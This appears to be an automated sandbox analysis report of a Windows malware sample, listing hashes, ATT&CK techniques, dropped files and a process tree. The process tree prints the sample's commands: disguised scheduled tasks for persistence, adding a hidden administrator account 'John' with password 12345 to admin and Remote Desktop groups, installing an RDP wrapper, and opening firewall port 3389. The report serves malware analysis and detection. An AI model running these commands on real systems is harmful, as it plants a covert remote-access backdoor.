4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50

Analysis

max time kernel
31s
max time network
188s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
29-12-2023 17:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c92c59fa1503d65d1d67a578928e3c55.exe
Size

6.2MB
MD5

c92c59fa1503d65d1d67a578928e3c55
SHA1

0cb1106bde45dd5be118bb7b9ebb2be3e41b7203
SHA256

4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50
SHA512

1f8c714bfc23bd642ec6f4e5539ac1585e0cd8a54ba2b72ff06d7b4f0dd94589a8e6ab41b689f11f51425067784e071eeffc7e803470d55793492d38f6d11241
SSDEEP

196608:CIgAn6JaxBEvXUJyXEJDNfZJoExr77dZWoNMUyr:SA6YxBYXY+sJokFZWdUy

Score

9^/10

evasion

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2104	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 2 IoCs

pid	Process
2928	winserv.exe
2932	winserv.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2756	schtasks.exe
2852	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1600	timeout.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\winmgmts:\	c92c59fa1503d65d1d67a578928e3c55.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	c92c59fa1503d65d1d67a578928e3c55.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2460	c92c59fa1503d65d1d67a578928e3c55.exe
2460	c92c59fa1503d65d1d67a578928e3c55.exe
2460	c92c59fa1503d65d1d67a578928e3c55.exe
2460	c92c59fa1503d65d1d67a578928e3c55.exe
2460	c92c59fa1503d65d1d67a578928e3c55.exe
2460	c92c59fa1503d65d1d67a578928e3c55.exe
2460	c92c59fa1503d65d1d67a578928e3c55.exe
2460	c92c59fa1503d65d1d67a578928e3c55.exe
2928	winserv.exe
2928	winserv.exe
2932	winserv.exe
2932	winserv.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2928	winserv.exe
2928	winserv.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2460 wrote to memory of 2852	2460	c92c59fa1503d65d1d67a578928e3c55.exe	29
PID 2460 wrote to memory of 2852	2460	c92c59fa1503d65d1d67a578928e3c55.exe	29
PID 2460 wrote to memory of 2852	2460	c92c59fa1503d65d1d67a578928e3c55.exe	29
PID 2460 wrote to memory of 2756	2460	c92c59fa1503d65d1d67a578928e3c55.exe	31
PID 2460 wrote to memory of 2756	2460	c92c59fa1503d65d1d67a578928e3c55.exe	31
PID 2460 wrote to memory of 2756	2460	c92c59fa1503d65d1d67a578928e3c55.exe	31
PID 2460 wrote to memory of 2928	2460	c92c59fa1503d65d1d67a578928e3c55.exe	37
PID 2460 wrote to memory of 2928	2460	c92c59fa1503d65d1d67a578928e3c55.exe	37
PID 2460 wrote to memory of 2928	2460	c92c59fa1503d65d1d67a578928e3c55.exe	37
PID 2460 wrote to memory of 2928	2460	c92c59fa1503d65d1d67a578928e3c55.exe	37
PID 2036 wrote to memory of 2932	2036	taskeng.exe	38
PID 2036 wrote to memory of 2932	2036	taskeng.exe	38
PID 2036 wrote to memory of 2932	2036	taskeng.exe	38
PID 2036 wrote to memory of 2932	2036	taskeng.exe	38

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c92c59fa1503d65d1d67a578928e3c55.exe
"C:\Users\Admin\AppData\Local\Temp\c92c59fa1503d65d1d67a578928e3c55.exe"
1⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2460
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2852
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2756
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2928
- - C:\ProgramData\Windows Tasks Service\winserv.exe
    "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
    3⤵
    PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net user John 12345 /add
  2⤵
  PID:1808
- - C:\Windows\system32\net.exe
    net user John 12345 /add
    3⤵
    PID:1636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
  2⤵
  PID:2508
- - C:\Windows\system32\net.exe
    net localgroup "Администраторы" John /add
    3⤵
    PID:620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
  2⤵
  PID:2040
- - C:\Windows\system32\net.exe
    net localgroup "Пользователи удаленного рабочего стола" John /add
    3⤵
    PID:1540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
      4⤵
      PID:2284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
  2⤵
  PID:1820
- - C:\Windows\system32\net.exe
    net localgroup "Пользователи удаленного управления" john /add" John /add
    3⤵
    PID:1568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
  2⤵
  PID:1216
- - C:\Windows\system32\net.exe
    net localgroup "Administrators" John /add
    3⤵
    PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
  2⤵
  PID:1276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
  2⤵
  PID:1080
- C:\ProgramData\RDPWinst.exe
  C:\ProgramData\RDPWinst.exe -i
  2⤵
  PID:1624
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
    3⤵
    - Modifies Windows Firewall
    PID:2104
- C:\Windows\system32\cmd.exe
  cmd /c C:\Programdata\Install\del.bat
  2⤵
  PID:2960
- - C:\Windows\system32\timeout.exe
    timeout 5
    3⤵
    - Delays execution with timeout.exe
    PID:1600

C:\Windows\system32\taskeng.exe
taskeng.exe {8CDD8121-ABC5-4693-B090-BD246144B656} S-1-5-21-452311807-3713411997-1028535425-1000:OZEMQECW\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2036
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2932
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  PID:2492
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  PID:2412

C:\Windows\system32\net.exe
net localgroup "Remote Desktop Users" john /add
1⤵
PID:1388
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
  2⤵
  PID:2088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
1⤵
PID:2312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
1⤵
PID:2292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user John 12345 /add
1⤵
PID:2084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
1⤵
PID:2092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
1⤵
PID:2128

C:\Windows\system32\net.exe
net localgroup "Administradores" John /add
1⤵
PID:1644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RDPWinst.exe

Filesize
63KB

MD5
25102de69d20503911240ed4049080cc

SHA1
f7b404de51a7536462697e38249cb21639aae50c

SHA256
20b7b9a8cd050446587ab7a448a30d7313e01bc6abcc34d521e63c24da84dadb

SHA512
d0cda41fff28e5991e7b4f4010f3fb505d08cbad222e8a27563ca141cf829c85c432d85eb883700fc79f5db4e396e636c4ffa41352dfcdbaf92b047c54019e7a

Download Submit
C:\ProgramData\RDPWinst.exe

Filesize
49KB

MD5
725e5093c243d706ec0813e32416a9f0

SHA1
a7103e6c103dbf80b906fab2f8d14ddb38a834f8

SHA256
726dc555869b0a0704b6b274276194aef130c057a3f4f0414da5c5fa10587ec8

SHA512
03953de47ada43111e49c47ec18ba73e02a165b4a8b3a9b47ad44ef6bb7b591335e7007ee026de25ebe448b5b26f8f364f369355662d662ee6b59d33fd649824

Download Submit
C:\ProgramData\Windows Tasks Service\settings.dat

Filesize
2KB

MD5
e21b95f6f2e5a0483e40b4caef16c718

SHA1
4310628908a9ff2c30064700f90a502cb3e13e49

SHA256
5deccd3b77e7f261ca0d427f0aa7dbdabb1d8c4ba92672a15855949813a16a58

SHA512
fd5b05a1f42ab36b39b4bfd08a244362b456bd5ecaee14912538d9a2d9c26583b0b824c4d606ae5e869cc143ea67d48269204dd5897878f35360439fd61246f2

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
1.0MB

MD5
1c5126132d25bbc58070b36202887165

SHA1
7563041418684c08292bc7f3a6300974f5b8bb13

SHA256
ceea05eee60251283e758282af6f73c8b6ceaccc38112beb32909828794d556d

SHA512
9521a0c02aec05dbe565db1d2abb3e7a61c1b72fe82b1310e24395f2a5ffe7e805ef4e1caeb5a07acbbff543b335f85ca30c27c639ac0d9165e8348a1de313e6

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
503KB

MD5
a2c6bff32b625a43d48642a3cef6bfe1

SHA1
74ca250a58010715291661a011c88befb0d59738

SHA256
92fb7b8aff92381420d4ca3a05485cfe28f180d02b26883c76314459d15464ca

SHA512
3ceed835710a35216f799383cc9cb47d7df2c0c3be2062487801320164d20160c620c05f633e05d8b8d32d7128445b3d08a3b73315edaf21649ba28e0c78aa39

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
18KB

MD5
b333ae395f51b408d0d14369b985ed9c

SHA1
fe449c4b6de79ed91ded208eced36948e6bc6810

SHA256
dd5943c151a8576f1a7ab1b94a7213ea6b930de1f712365b682ddfb557846220

SHA512
3d740200b64f93c1b2a5e9ed302a10192e2076aced54b1110013f0ded8b39705b891bdcaeedd4d85fd0b02b38bb2871a4073c6cbc3bbc8223cc528180efbf216

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
37KB

MD5
f9e0e2021d2cd03d3b948d17a6a326b1

SHA1
49067200a330f0a85a7473b97b3c18f5ce7ab22c

SHA256
82bd79dacf1e6475841d5caf57dcfadf1ab015cf170effa829de6e075250b5e4

SHA512
5fa23db3a9021d8a62482e0de10d2694936510470726913c6d75994474450a76ef054c745dbfe0c6011d0b591a895171fa5ef75b8a8b80632076c2f34215d957

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
64KB

MD5
4bd9b6a43b4765f3eda11037c669029e

SHA1
ea275bd392f18b6361745ac26c1dec6aa04ecfed

SHA256
0709bd9618271e5b41ca342bd0250cbc846747a172418d075dbd644de48b5802

SHA512
0fae4f6f46eb960adc77e931801d0022615dee8ef90f56307b4413db339529d08f80cc08c3bcb3946226b626221ecb2a54123fb1097d7beeee85539a40dcc8a4

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
1.4MB

MD5
234795a336af55bb27e6639200fd41d0

SHA1
876406febd691c95ea47af63984fd3155ef6f688

SHA256
2cb0723ab9a7237d47d6220db89d02a88be90790319f734678c2ab1d8bb503d2

SHA512
3319c40ed22bab331636bd89e8199c6ae55db281a062bcc368e3c34e11d5febd3f9ef1ffa81e1b9e78b382b5249ccd5c982ad2729cceb1f29c55b23a385701e7

Download Submit
C:\Programdata\Install\del.bat

Filesize
315B

MD5
155557517f00f2afc5400ba9dc25308e

SHA1
77a53a8ae146cf1ade1c9d55bbd862cbeb6db940

SHA256
f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e

SHA512
40baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9689.tmp

Filesize
33KB

MD5
4e7ee1c406c6dae2e66c9a3d30f746a3

SHA1
b0e251751ae61a961c8d7519ed865cb1770aa6bf

SHA256
5add5e967d3b7f8ecec2be784f7a77c878be618c2c8547affe717d97bd3c076d

SHA512
f8a72c14f9fc0c92cac3890ef72e8121538b1b19ff23ba581a4e3361888223ecd6058dd9533a51be5d51fa61dd1beb9eb4906fbd026fa991e6fb73ab28d58135

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarCDD1.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
memory/1352-64-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1352-31-0x0000000004260000-0x0000000004261000-memory.dmp

Filesize
4KB

Download
memory/1352-75-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1352-28-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1352-47-0x0000000005C40000-0x0000000005C41000-memory.dmp

Filesize
4KB

Download
memory/1352-29-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1352-25-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1352-30-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1352-38-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

Filesize
4KB

Download
memory/1352-37-0x00000000055D0000-0x00000000055D1000-memory.dmp

Filesize
4KB

Download
memory/1352-36-0x0000000005530000-0x0000000005531000-memory.dmp

Filesize
4KB

Download
memory/1352-41-0x0000000005940000-0x0000000005941000-memory.dmp

Filesize
4KB

Download
memory/1352-40-0x0000000005B80000-0x0000000005B81000-memory.dmp

Filesize
4KB

Download
memory/1352-44-0x0000000005B90000-0x0000000005B91000-memory.dmp

Filesize
4KB

Download
memory/1352-42-0x0000000004240000-0x0000000004241000-memory.dmp

Filesize
4KB

Download
memory/1352-43-0x0000000004250000-0x0000000004251000-memory.dmp

Filesize
4KB

Download
memory/1352-39-0x0000000005580000-0x0000000005581000-memory.dmp

Filesize
4KB

Download
memory/1352-35-0x00000000042B0000-0x00000000042B1000-memory.dmp

Filesize
4KB

Download
memory/1352-34-0x00000000042A0000-0x00000000042A1000-memory.dmp

Filesize
4KB

Download
memory/1352-33-0x0000000004280000-0x0000000004281000-memory.dmp

Filesize
4KB

Download
memory/1352-32-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/1352-45-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1624-65-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2412-121-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2412-119-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2492-72-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2492-74-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2492-73-0x0000000000300000-0x0000000000301000-memory.dmp

Filesize
4KB

Download
memory/2492-70-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2492-71-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2928-17-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2928-18-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2928-16-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2928-15-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2928-14-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2928-20-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2928-21-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2928-12-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2932-24-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2932-22-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/2932-13-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download